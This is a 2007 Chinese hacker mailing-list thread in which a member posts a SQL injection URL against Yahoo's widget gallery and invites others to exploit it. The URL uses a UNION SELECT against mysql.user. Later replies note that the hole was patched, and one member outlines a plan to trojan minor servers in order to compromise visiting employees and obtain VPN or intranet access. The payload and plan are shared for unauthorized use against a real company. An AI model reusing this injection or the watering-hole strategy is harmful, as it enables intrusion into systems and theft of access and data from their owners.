回复: 回复:[Ph4nt0m] 回复: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
23 views
Skip to first unread message
云舒
Apr 8, 2007, 11:10:05 PM4/8/07
to ph4nt0m
你这个说的是什么意思?什么叫得到好处?
----- 原始邮件 ----
发件人: 693149 <693...@qq.com>
收件人: 云舒 <wusty...@yahoo.com.cn>; ph4nt0m <ph4...@googlegroups.com>
已发送: 2007/4/9(周一), 上午10:51:47
主题: 回复:[Ph4nt0m] 回复: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
雅虎免费邮箱-3.5G容量,20M附件
发件人: 693149 <693...@qq.com>
收件人: 云舒 <wusty...@yahoo.com.cn>; ph4nt0m <ph4...@googlegroups.com>
已发送: 2007/4/9(周一), 上午10:51:47
主题: 回复:[Ph4nt0m] 回复: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
看来云舒是得到好处了 呵呵
-------------原始邮件------------
发件人:"云舒"<wusty...@yahoo.com.cn>
发送时间:2007年4月9日(星期一) 上午09:16
收件人:"ph4nt0m"<ph4...@googlegroups.com>;
主题:[Ph4nt0m] 回复: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
行,请你吃饭,呵呵。
非常感谢你的消息!
----- 原始邮件 ----
发件人: hs mw <hsmw26...@hotmail.com>
收件人: ph4...@googlegroups.com
已发送: 2007/4/8(周日), 下午2:45:26
主题: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
Mp3疯狂搜-新歌热歌高速下
发件人: hs mw <hsmw26...@hotmail.com>
收件人: ph4...@googlegroups.com
已发送: 2007/4/8(周日), 下午2:45:26
主题: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
郁闷.
我找到洞洞.
.云舒.你要请我吃饭。 QQ:26836659
>From: "20721" <20...@qq.com>
>To: "hs mw" <hsmw26...@hotmail.com>
>Subject: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞
头的朋友,可以看一下。
>Date: Sun, 8 Apr 2007 14:39:50 +0800
>
>你丫的不知道云MM在雅虎?
>
>-------------原始邮件------------
>发件人:"hs mw"<hsmw26...@hotmail.com>
>发送时间:2007年4月8日(星期天) 下午02:37
>收件人:"ph4nt0m"<ph4...@googlegroups.com>;
>
>主题:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友
,可以看一下。
>
>我靠。!我今天早上来看.主入点就给修补了!!!!
>
>
> >From: "xuenfu" <cnh...@163.com>
> >Reply-To: ph4...@googlegroups.com
> >To: "ph4...@googlegroups.com" <ph4...@googlegroups.com>
> >Subject: [Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一
yahoo 的主入点.觉得有搞头的
>朋友,可以看一下。
> >Date: Sun, 8 Apr 2007 14:04:18 +0800
> >
> >你在砸云舒的饭碗!
> >
> >
> >
> >
> >xuenfu
> >2007-04-08
> >
> >
> >
> >发件人: 云舒
> >发送时间: 2007-04-07 23:45:46
> >收件人: ph4...@googlegroups.com
> >抄送:
> >主题: [Ph4nt0m] 回复: [Ph4nt0m] 找到一
yahoo 的主入点.觉得有搞头的朋友,可
>以看一下。
> >
> >暂且手下留情……
> >
> >
> >----- 原始邮件 ----
> >发件人: hs mw <hsmw26...@hotmail.com>
> >收件人: ph4...@googlegroups.com
> >已发送: 2007/4/7(周六), 下午11:40:48
> >主题: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋
友,可以看一下。
> >
> >
>
>http://widgets.yahoo.com/gallery/view.php?widget=39352/**/and/**/1=2/**/union/**/select/**/user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20mysql.user
>
> >
> >
> >_________________________________________________________________
> >与联机的朋友进行交流,请使用
MSN Messenger: http://messenger.msn.com/cn
> >
> >
> >
> >
> >雅虎免费邮箱-3.5G容量,20M附件
> >
> >>
>
>_________________________________________________________________
>享用世界上最大的电子邮件系统— MSN Hotmail。
http://www.hotmail.com
>
>
>>
_________________________________________________________________
与联机的朋友进行交流,请使用 MSN Messenger: http://messenger.msn.com/cn
我找到洞洞.
.云舒.你要请我吃饭。 QQ:26836659
>From: "20721" <20...@qq.com>
>To: "hs mw" <hsmw26...@hotmail.com>
>Subject: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞
头的朋友,可以看一下。
>Date: Sun, 8 Apr 2007 14:39:50 +0800
>
>你丫的不知道云MM在雅虎?
>
>-------------原始邮件------------
>发件人:"hs mw"<hsmw26...@hotmail.com>
>发送时间:2007年4月8日(星期天) 下午02:37
>收件人:"ph4nt0m"<ph4...@googlegroups.com>;
>
>主题:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友
,可以看一下。
>
>我靠。!我今天早上来看.主入点就给修补了!!!!
>
>
> >From: "xuenfu" <cnh...@163.com>
> >Reply-To: ph4...@googlegroups.com
> >To: "ph4...@googlegroups.com" <ph4...@googlegroups.com>
> >Subject: [Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一
yahoo 的主入点.觉得有搞头的
>朋友,可以看一下。
> >Date: Sun, 8 Apr 2007 14:04:18 +0800
> >
> >你在砸云舒的饭碗!
> >
> >
> >
> >
> >xuenfu
> >2007-04-08
> >
> >
> >
> >发件人: 云舒
> >发送时间: 2007-04-07 23:45:46
> >收件人: ph4...@googlegroups.com
> >抄送:
> >主题: [Ph4nt0m] 回复: [Ph4nt0m] 找到一
yahoo 的主入点.觉得有搞头的朋友,可
>以看一下。
> >
> >暂且手下留情……
> >
> >
> >----- 原始邮件 ----
> >发件人: hs mw <hsmw26...@hotmail.com>
> >收件人: ph4...@googlegroups.com
> >已发送: 2007/4/7(周六), 下午11:40:48
> >主题: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋
友,可以看一下。
> >
> >
>
>http://widgets.yahoo.com/gallery/view.php?widget=39352/**/and/**/1=2/**/union/**/select/**/user(),2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%20mysql.user
>
> >
> >
> >_________________________________________________________________
> >与联机的朋友进行交流,请使用
MSN Messenger: http://messenger.msn.com/cn
> >
> >
> >
> >
> >雅虎免费邮箱-3.5G容量,20M附件
> >
> >>
>
>_________________________________________________________________
>享用世界上最大的电子邮件系统— MSN Hotmail。
http://www.hotmail.com
>
>
>>
_________________________________________________________________
与联机的朋友进行交流,请使用 MSN Messenger: http://messenger.msn.com/cn
Mp3疯狂搜-新歌热歌高速下
雅虎免费邮箱-3.5G容量,20M附件
root
Apr 9, 2007, 2:54:56 AM4/9/07
to ph4...@googlegroups.com
云舒,您好!
693149
没见过真正有影响力的漏洞,鉴定完毕!
======== 2007-04-09 11:14:41 您在来信中写道:
========
|
ir4dex
Apr 9, 2007, 6:18:31 AM4/9/07
to Ph4nt0m
像这样的php注入是很多的~就和跨站一样.
微软也可以跨.`~
大风
Apr 9, 2007, 9:17:18 PM4/9/07
to ph4...@googlegroups.com
对于大型网站来说,跨站比注射多多了。
在WEB的 三层架构下,可以很大程度杜绝注射的问题,但是由于网站应用太多,所以可
能有个别服务器还是用的2层架构(审事),但这种服务器一般都不会太重要,很可能
还是单独划出来的一个网段,无法连到其他重要的服务器段。
-----邮件原件-----
发件人: ph4...@googlegroups.com [mailto:ph4...@googlegroups.com] 代表
ir4dex
发送时间: 2007年4月9日 18:19
收件人: Ph4nt0m
主题: [Ph4nt0m] Re: 回复: 回复:[Ph4nt0m] 回复: [Ph4nt0m] RE: 回
复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可
以看一下。
像这样的php注入是很多的~就和跨站一样.
以看一下。
微软也可以跨.`~
Netx Fly
Apr 10, 2007, 12:58:41 AM4/10/07
to ph4...@googlegroups.com
root
Apr 10, 2007, 1:03:14 AM4/10/07
to ph4...@googlegroups.com
大风,您好!
这只是个众多攻击策略里的最简单的策略:不重要的机器如果被挂马后,这样就可以搞定在家/在公司访问公司主页的员工电脑,这样就有可能获取一个vpn账号或直接获取内网访问权限。
== 2007-04-10 09:21:29 您在来信中写道:=======
2007-04-10
这只是个众多攻击策略里的最简单的策略:不重要的机器如果被挂马后,这样就可以搞定在家/在公司访问公司主页的员工电脑,这样就有可能获取一个vpn账号或直接获取内网访问权限。
== 2007-04-10 09:21:29 您在来信中写道:=======
root
Apr 10, 2007, 1:10:07 AM4/10/07
to ph4...@googlegroups.com
Netx Fly,您好!
我的这个邮箱没这么早申请吧,我应该是在03年申请的。什么部队啊,是不是认错人了。
======== 2007-04-10 13:02:20 您在来信中写道:
========
|
sunshine timego
Apr 10, 2007, 2:51:40 AM4/10/07
to ph4...@googlegroups.com
大风
Apr 10, 2007, 5:02:55 AM4/10/07
to ph4...@googlegroups.com
有一些的,具体可以参考我以前的 blog
http://blog.donews.com/axis/archive/2005/11/22/635539.aspx
不过个人感觉这个还是以经验为主,漏洞越来越不好找了。
发件人: ph4nt0m@googlegroups.com
[mailto:ph4nt0m@googlegroups.com]
代表
sunshine
timego
发送时间: 2007年4月10日 14:52
收件人: ph4nt0m@googlegroups.com
主题: [Ph4nt0m]
Re: 答复: [Ph4nt0m] Re: 回复:
回复:[Ph4nt0m] 回复: [Ph4nt0m] RE: 回复:[Ph4nt0m] Re: 回复: [Ph4nt0m] 找到一 yahoo 的主入点.觉得有搞头的朋友,可以看一下。
现在没有太好的太全面的代码审计软件,靠人工审计有点夸张
在07-4-10,大风 <opens...@gmail.com> 写道:
.`~
<br
root
Apr 10, 2007, 11:58:06 AM4/10/07
to ph4...@googlegroups.com
大风,您好!
你说的对,经验、思路和全面性,其实渗透入侵一直都不缺漏洞,更不需要0day,只要一个端口扫描器一个google就足够了。
======== 2007-04-10 17:39:20 您在来信中写道:
========
Reply all
Reply to author
Forward
0 new messages